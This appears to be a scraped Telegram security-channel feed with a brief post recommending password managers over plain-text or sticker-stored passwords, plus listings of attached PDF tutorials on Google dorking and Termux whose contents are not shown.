>passwords should not be stored on a computer in text files, as well as in public places (a sticker with a password on a computer is also bad)
>Under these conditions, you need to remember a large number of complex passwords, which is practically impossible. Therefore, many users do not comply with these conditions (which is bad), and those who comply are forced to write passwords, for example, to a text file (if the file is not encrypted, then this is also bad).
π¦A password manager can help in this situation - a program that stores your password in encrypted form. That is, instead of many passwords, you only need to remember one master password.
written by undercode
β β β Uππ»βΊπ«6π¬πβ β β β
Google hacking (dorking) tutorial #1.pdf
261.2 KB
The most requested tutorial
Forwarded from UNDERCODE SECURITY
Termux Tutorials by Techncyber.pdf
1.3 MB
Termux command tutorial & tools